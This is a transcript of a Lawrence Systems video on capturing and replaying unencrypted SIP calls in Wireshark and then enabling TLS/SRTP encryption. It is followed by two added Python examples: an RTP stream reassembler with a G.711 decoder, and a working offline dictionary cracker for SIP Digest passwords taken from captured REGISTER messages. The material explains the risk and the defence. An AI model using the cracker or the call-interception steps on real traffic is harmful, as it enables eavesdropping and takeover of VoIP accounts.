Wireshark SIP Capture

Captions
Tom here from Lawrence Systems. We're going to talk about Wireshark and SIP. There's a lot of fun you can have, because Wireshark has built-in ways to decode SIP calls, and I want to cover how that works, and of course at the end we'll cover how to mitigate against that. I just think it's kind of a fun technical dive into a couple of things I've talked about before, and showing them, well, somewhat of a practical use, if this is something you want in terms of sniffing out packets and seeing how it goes. It's also a fun learning exercise to learn how the SIP protocol works and what you can glean from sniffing the packets.

Before we dive into that, let's first... if you'd like to learn more about me or my company, head over to lawrencesystems.com. If you'd like to hire us for a project, there's a Hire Us button right at the top. If you'd like to help keep this channel sponsor-free, and thank you to everyone who already has, there is a Join button here for YouTube and a Patreon page. Your support is greatly appreciated. If you're looking for deals or discounts on products and services we offer on this channel, check out the affiliate links down below; they're in the description of all of our videos, including a link to our shirt store. We have a wide variety of shirts that we sell, and new designs come out, well, randomly, so check back frequently. And finally, our forums, forums.lawrencesystems.com, is where you can have a more in-depth discussion about this video and other tech topics you've seen on this channel. Now back to our content.

Not a prerequisite for this video, but I want to mention that Remote Real-Time Packet Capture with Wireshark and pfSense is a video I've done previously. That's the methodology I'll be using. Capture packets any way that you see fit; to me this is the easy way to do it, because I happen to have a pfSense on my network, and we're going to filter it for this particular device next to me. The device next to me is a Sangoma phone, and I'm just using the standard SIP protocol because it's the most common protocol out there for the way things are transported. The server we're going to be using is not a FreePBX server; we actually have this set up, and these will be some future videos I do, where you can set phones up, whatever SIP phone you'd like, directly with a VoIP.ms account. This is our McTestface account specifically that we're using, so don't worry about any phone numbers and things I show. This is what we're always using McTest for, is for testing, because sometimes people see a number and they feel compelled to call it. That's perfectly fine; this is not a customer phone number. I don't know why you would call it; I don't know if I'll answer it if you do call it. Anyways, not to get off topic, but this is set up with the cloud NVR system using SIP, using VoIP.ms. I have a review, I'll link to it, of VoIP.ms for those of you curious, and towards the end we're going to cover call encryption, how to get around this, and turning on call encryption, which of course is supported by VoIP.ms, for those wondering.

And one last thing I'll mention: I'll leave an article here. This is one of the reasons that when you use SIP, because not every SIP device has support for call encryption, once you see what we can do without encryption, you may want to consider encryption. But it's also not as big of a deal as you might think, because of the passwords that are being passed back and forth. Yes, SIP uses MD5 for password cracking, but this is why you use really long, random SIP passwords, to help mitigate this problem of someone getting in there and potentially grabbing this traffic and pulling your password. I'll leave a link to this article; I'm not going to dive into the nuance, it goes out of scope of this. But let's have the fun part and talk about how this is going to work.

So here's our wireshark -k -i ssh root 3.1. There's our pfSense we're logging into. We're using tcpdump; it's attached to our LAN, which is on igb0. The host we're filtering for is only one host. Now the reason, and like I said I have a reference video on this, is I don't want all the noise on the network; I want just the noise that's related to this particular phone. And once again we see the IP address of the phone. So let's go ahead and kick off that command here, and it's going to kick off Wireshark, and it's going to drop it right in listed mode. Not much going on; let's make a phone call. So we're going to call my office, so you don't have to wonder what numbers I'm dialing or play games of DTMF tones. So we're calling my main office number, that I just dialed wrong, I think. I sure did, so don't listen to those DTMF tones. There we go. "...and we hope you're having a fantastic day. If you know your party's extension, you can dial it at any time. Currently our retail office is closed, but this..." All right, pretty simple. That was test one. Let's do one more test where I dial an extension. "Thank you for calling Lawrence Systems, and we hope you're having a... We have not received a valid response. Please try again." There we go. [Music] All right, I set this extension up. You can hear some echo because it's, uh, canceling the noise cancellation, so it doesn't just... you get the idea.

Anyways, now we have data. We've watched all the data go across here, and now we can actually stop Wireshark if we don't need to collect any more. Go here, and hey, look, here is all the stuff. Here's our SIP. We've got a lot of good information here. We can see it going through; we could probably see the transport layer, make tests, all right, great, all these different statuses. What does all this mean? What are these RTP streams? Well, that's where Wireshark becomes fun, and we can go right here to VoIP Calls, and there's our first call. Let's play it, and I'm going to turn the volume up on my laptop here so it should be able to pick up on a microphone, and hit play. "Thank you for calling Lawrence Systems, and we hope you're having a fantastic day. If you know your party's extension, you can dial it at any time. Currently our retail office is closed, but this is emergency..." All right, let's try that other one where we actually pressed a lot more buttons. "Thank you for calling Lawrence Systems, and we hope you're having fun... We have not received a valid response. Please try again... All right, set this extension up, you can hear because some echo canceling the noise cancellation so it doesn't just get it down, you get it anyway."

All right, you kind of see what happened here. We were able to dive into it, grab the stream, replay it back, and all I had to go to was Telephony, VoIP Calls, and it plays them. Now there's also a lot more you can of course do. You can follow the SIP statistics; we can pull this together. And one of the things that, so besides the fun that we just had, and being able to easily play back a phone call, this is where you can dive into and use this to troubleshoot SIP problems you're having. This is one of the tools that we actually use when we're troubleshooting networks that, well, they have problems; that's the best way to describe it. When someone wants us to dive deep into something, Wireshark can help us go through, look for problems, look for what flows aren't working. My network's set up properly, so everything works properly, so it's not a big deal.

By the way, in case you're wondering, this question comes up: this is all done with SIP NAT, which means there's no open ports on the firewall to make this happen. SIP NAT means it reaches out to register with the servers, which is of course supported by VoIP.ms, to bring the registration back, and no ports had to be opened. There's no special configuration in my pfSense. Matter of fact, I've tested this by taking this phone to different places; it works through the majority of firewalls that we've goofed around and tested with, without doing any port forwarding. I bring that up because some people ask me why you need port forwarding for SIP, and the answer is, if you don't have a provider that properly supports SIP NAT, you'll need that.

But back over to here. One of the other things you can see here is, by following the SIP flows, now you're actually looking at the calls. Notice anything about these calls? 313-299-1503, yes, that's our office number, it's published on our website, so I didn't reveal any secrets here. But you're also diving into what step occurred for each piece, so you can go back and look at those streams. This is what's important about when you're troubleshooting: being able to go back through here, look at what happened, and of course maybe what didn't happen. And you do this by comparison, where you'll take packets from a phone system, by looking at them, and go, okay, this one the call went through, but this other phone on the other office didn't. So you'll trace them, you'll do some compare and contrast here to go, all right, which one of these worked.

But of course I said I'd tell you how to fix this. So let's go ahead and close all this; I don't need to save any of these packets. And let's go and make changes to this system that allow it to be encrypted. Now like I said, the password was passed through MD5; that is still going to be the case, but if we wrap this in a layer of encryption, it's going to be a little harder to trace. So go ahead and let's dive into that. Go over here to VoIP.ms, and this is the sub account for Mr. McTestface, and McTestface needs encryption. So we go here, Advanced, we just say Encrypt SIP Traffic: Yes, we hit Update Account. I get a notice that it takes one minute for this to take effect. Cool, so not a problem there. They have an entire write-up, pretty easy, you could click the question mark, of how to set the settings for these accounts, how to do that, and then of course the notes of what you need to do. Now there's so many different softphones and PBXs; let's talk about the options. I'm going to walk you through how to do it in Sangoma, but these instructions are kind of generic, of course, to apply to whatever you're doing, whatever type of SIP client you have. That being said, please note not all clients will be able to support this, but the Sangoma phone does support this.

Now the first thing we do is we change from 5060 to 5061. So there we go. Then we've got to go here and we change it to TLS; this is going to be the Transport Layer Security that we're implementing. So those are two changes that need to be done there. Then we'll go ahead and hit Save and Set. Oops, it wasn't logged in because I timed out. Yes, it's all... it's a default password. Someone's going to go, "Tom, you left it at default." Yeah, it's a lab demo. If you don't know, the Sangoma default passwords are 222, anyways, six twos, if I didn't say enough. So TLS, 5061, make sure it's Save and Set. Account, Advanced, one more thing we need to set here: go down and find the SRTP mode, and we want to set Enable and Require. And that's actually per the instructions here, that you'll have to set Enable and Required, and right there is where it said to use 5061; they have some other options if you need other ports. Back over to the phone, though, we're going to go ahead and Save and Set, and for good measure I always like to restart the phone after I've saved all settings. We'll reboot it. I'll just fast forward to the phone being already rebooted and confirm that it registered; that way we know it works, because having a setting in there, I always like to reboot things, because eventually they'll get rebooted, so I like to make sure that they work on reboot, not just when I click the button. Now as soon as this reboots, we'll log back in. We log back in, we see the phone's registered, and let's go ahead and Wireshark it again. So we're going to go ahead and just up arrow, Enter. All right, and a history, and we'll just redial that number again. Send. "Thank you for calling Lawrence Systems, and we hope you're having a fantastic day. If you know your party's extension, you can dial it at any time. Currently our retail office is closed..." All right, we have some data now. Let's start digging through this and figure out what Wireshark is able to see this time. Telephony, VoIP Calls: nothing. That was encrypted, so I can't tap the phone anymore. That's no fun. What else can we see? Let's look at the SIP flows: nothing. Well, that didn't help me much. SIP statistics: it doesn't even think it's SIP traffic anymore.

Now this is where the good and bad comes in. By doing this one, I have now prevented anyone who could possibly get in between me and my VoIP provider from tapping the phone calls, and that, you know, could be an issue. This is one of the reasons we generally will put phones on a separate network, and there's tools like LLDP that allow you to automatically do this with VLANs, et cetera. But the other side of this is, this makes SIP troubleshooting substantially harder. Not that that's an excuse, but sometimes when you're first trying to test something, you may want to test it unencrypted, go through the troubleshooting process, but then once you know it works, change those couple of settings real quick and move it towards encrypted. And this is the good and bad. I know there's going to be a bunch of people angry that I would ever say it's okay to use unencrypted SIP. The reality is you live in the real world. One, you run into tons of systems, especially older systems that we deal with, that just don't have these supports; they don't support UDP in a TLS layer together, it's just not part of their function. Or you just run into troubleshooting issues where it's just easier, and just change the password later. It's just kind of a process by which you do it. Now, by the way, if you didn't notice in here, everything is still being transferred over UDP, because it's the way phone traffic is done, but it's done so completely in an encrypted manner, so, you know, it's a lot more protected.

Now like I said, this is a whole process in learning, in my opinion. So being able to use these tools, being able to do this, gives you some better ideas of how these transport layers work, how they can be looked at, how they can possibly be exploited, and I just want to raise awareness of it and get people playing. One of the goals I always have with this channel is to get more people into technology. I know a lot of homelab people; this is a fun thing you can do when you're going, okay, I built all this fun stuff, what can I do with it? This is a great way to dive in, to get a better understanding of network engineering, and, you know, apply it with all the different phone systems you have. It's always fun to me, diving into the packets and looking at the flows and everything else. I'll leave a link to the other videos I've done on Wireshark, and of course the one I've done with pfSense, and let me know what else you'd like, and leave some comments below, or head over to our forums to have a further and more in-depth discussion.

Thanks, and thank you for making it to the end of the video. If you like this video, please give it a thumbs up. If you'd like to see more content from the channel, hit the Subscribe button, and hit the bell icon if you'd like YouTube to notify you when new videos come out. If you'd like to hire us, head over to lawrencesystems.com, fill out our contact page, and let us know what we can help you with and what projects you'd like us to work together on. If you want to carry on the discussion, head over to forums.lawrencesystems.com, where we can carry on the discussion about this video, other videos, or other tech topics in general. Even suggestions for new videos, they're accepted right there on our forums, which are free. Also, if you'd like to help the channel in other ways, head over to our affiliate page; we have a lot of great tech offers for you. And once again, thanks for watching, and see you next time.
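What Wireshark's Telephony, VoIP Calls player does with the unencrypted capture in the video is mechanical: it groups RTP packets by SSRC, puts them back in sequence-number order, notes any gaps, and decodes the audio payload (payload type 0 is G.711 u-law per RFC 3551) into PCM samples. The following is an added example that is not from the video or from Wireshark; it implements that reassembly and decode step by hand over a few RTP packets constructed inline (the SSRC, sequence numbers and payload bytes are made up for the demo), including out-of-order arrival, a 16-bit sequence wrap, a dropped packet and a duplicate.

```python
"""Added example: reassemble an RTP stream from captured packets and decode
G.711 u-law audio, the way a VoIP-call player does.  Packets below are
constructed for the demo, not taken from a real capture."""
import struct

RTP_FIXED = struct.Struct("!BBHII")  # V/P/X/CC, M/PT, sequence, timestamp, SSRC (RFC 3550)
PT_PCMU = 0                          # static payload type 0 = G.711 u-law (RFC 3551)


def parse_rtp(packet: bytes) -> dict:
    """Decode one RTP packet into its header fields and payload."""
    if len(packet) < RTP_FIXED.size:
        raise ValueError("packet shorter than RTP fixed header")
    b0, b1, seq, ts, ssrc = RTP_FIXED.unpack_from(packet)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    padding, extension, csrc_count = (b0 >> 5) & 1, (b0 >> 4) & 1, b0 & 0x0F
    offset = RTP_FIXED.size + 4 * csrc_count          # skip CSRC list
    if extension:                                     # skip header extension
        _, ext_words = struct.unpack_from("!HH", packet, offset)
        offset += 4 + 4 * ext_words
    payload = packet[offset:]
    if padding and payload:                           # last byte = pad length
        payload = payload[:-payload[-1]]
    return {"seq": seq, "ts": ts, "ssrc": ssrc, "pt": b1 & 0x7F,
            "marker": b1 >> 7, "payload": payload}


def build_rtp(seq: int, ts: int, ssrc: int, payload: bytes, pt: int = PT_PCMU) -> bytes:
    """Build a minimal RTP packet (used only to construct the demo input)."""
    return RTP_FIXED.pack(0x80, pt, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload


def reassemble_streams(packets) -> dict:
    """Group packets by SSRC, restore sequence order (wrap-aware), drop
    duplicates and report missing sequence numbers for each stream."""
    by_ssrc = {}
    for pkt in packets:
        r = parse_rtp(pkt)
        by_ssrc.setdefault(r["ssrc"], []).append(r)
    streams = {}
    for ssrc, rs in by_ssrc.items():
        seqs = [r["seq"] for r in rs]
        if max(seqs) - min(seqs) > 0x8000:   # counter wrapped 65535 -> 0
            base = min(s for s in seqs if s >= 0x8000)
        else:
            base = min(seqs)
        rs.sort(key=lambda r: (r["seq"] - base) & 0xFFFF)
        audio, missing, expected = bytearray(), [], base
        for r in rs:
            if (r["seq"] - expected) & 0xFFFF > 0x8000:
                continue                      # behind the cursor: duplicate
            while r["seq"] != expected:       # gap: a packet was lost
                missing.append(expected)
                expected = (expected + 1) & 0xFFFF
            audio += r["payload"]
            expected = (expected + 1) & 0xFFFF
        streams[ssrc] = {"payload_type": rs[0]["pt"], "payload": bytes(audio),
                         "missing": missing}
    return streams


def decode_g711u(payload: bytes) -> list:
    """Expand G.711 u-law bytes to 16-bit linear PCM samples."""
    samples = []
    for b in payload:
        b = ~b & 0xFF
        sign, exponent, mantissa = b & 0x80, (b >> 4) & 0x07, b & 0x0F
        value = (((mantissa << 3) + 0x84) << exponent) - 0x84
        samples.append(-value if sign else value)
    return samples


# Constructed demo stream: arrives out of order, wraps at 65535, loses seq 0,
# and carries one duplicate of seq 65534.
DEMO_SSRC = 0x1234ABCD
DEMO_PACKETS = [
    build_rtp(65534, 0, DEMO_SSRC, b"\xff" * 4),     # silence (u-law 0xFF == 0)
    build_rtp(1, 480, DEMO_SSRC, b"\x80" * 4),       # max positive sample
    build_rtp(65535, 160, DEMO_SSRC, b"\x00" * 4),   # max negative sample
    build_rtp(65534, 0, DEMO_SSRC, b"\xff" * 4),     # duplicate
]

if __name__ == "__main__":
    for ssrc, s in reassemble_streams(DEMO_PACKETS).items():
        print(f"SSRC {ssrc:#x} pt={s['payload_type']} missing={s['missing']} "
              f"samples={decode_g711u(s['payload'])[:12]}")
```

The u-law decoder gives you the PCM a player would write to the sound card; the `missing` list is the same information Wireshark reports as lost packets in RTP Stream Analysis, and it is usually the first thing to look at when a call has gaps.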
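The video says twice that the SIP password goes across as MD5 and that the defence is a long random password. The reason is that SIP uses HTTP Digest authentication (RFC 3261 section 22): the REGISTER carries `response = MD5(MD5(user:realm:password):nonce:MD5(method:uri))`, so whoever holds an unencrypted capture can test candidate passwords offline at MD5 speed without ever touching the provider. The block below is an added example, not from the video or from any SIP vendor: it parses the Authorization header out of a captured REGISTER, recomputes the digest for each entry in a wordlist and reports a hit. The user name, realm, nonce, wordlist and the REGISTER itself are constructed inline for the demo; the qop=auth variant is handled as well so it works on real captures, not just this one.

```python
"""Added example: offline dictionary attack against a SIP Digest
Authorization header taken from an unencrypted REGISTER.  All values
(user, realm, nonce, wordlist) are constructed for the demo."""
import hashlib
import re

SAMPLE_WORDLIST = ["1234", "password", "voip", "sangoma", "1234567890"]  # constructed


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None) -> str:
    """RFC 2617 digest as SIP uses it (RFC 3261 section 22.4)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop:  # qop=auth mixes in the nonce count and client nonce
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def build_register(password: str, nonce: str = "4d3f2c1b9a8e7f60") -> str:
    """Constructed REGISTER as a phone would send it after a 401 challenge."""
    username, realm = "123456_demo", "sip.example.invalid"   # assumed names
    uri = f"sip:{realm}"
    resp = digest_response(username, realm, password, "REGISTER", uri, nonce)
    return (
        f"REGISTER {uri} SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-demo\r\n"
        f"From: <sip:{username}@{realm}>;tag=1\r\n"
        f"To: <sip:{username}@{realm}>\r\n"
        f'Authorization: Digest username="{username}", realm="{realm}", '
        f'nonce="{nonce}", uri="{uri}", response="{resp}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


def parse_authorization(sip_message: str) -> dict:
    """Return the request method plus the Digest parameters of a captured request."""
    method = sip_message.split("\r\n", 1)[0].split(" ", 1)[0]
    m = re.search(r"^Authorization:\s*Digest\s+(.*)$", sip_message, re.M)
    if not m:
        raise ValueError("no Digest Authorization header in message")
    params = {"method": method}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', m.group(1)):
        params[key] = quoted if quoted else bare
    return params


def crack_digest(sip_message: str, wordlist) -> "str | None":
    """Recompute the response for every candidate; return the one that matches."""
    p = parse_authorization(sip_message)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, p["method"],
                                p["uri"], p["nonce"], p.get("qop"), p.get("nc"),
                                p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


if __name__ == "__main__":
    weak = build_register("sangoma")
    strong = build_register("Xk9vQ2pL7mR4tWz8Hc3N")   # long random: not in any wordlist
    print("weak   ->", crack_digest(weak, SAMPLE_WORDLIST))
    print("strong ->", crack_digest(strong, SAMPLE_WORDLIST))
```

A real attacker runs this with hashcat rather than a Python loop, which is why the video's advice holds: the nonce stops replay, not guessing, and only password length defeats the offline search. Wrapping SIP in TLS, as done at the end of the video, removes the Authorization header from the capture altogether.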
Info
Channel: Lawrence Systems
Views: 18,686
Rating: 4.9506173 out of 5
Keywords: lawrencesystems, wireshark sip, wireshark sip troubleshooting, wireshark sip call flow, wireshark sip analysis, wireshark sip capture, wireshark sip capture filter, wireshark sip ladder diagram, wireshark sip tls, wireshark, sip, voip, tutorial, rtp, wireshark (software), session initiation protocol (protocol)
Id: OE7AgTAqNoo
Length: 14min 56sec (896 seconds)
Published: Tue Oct 13 2020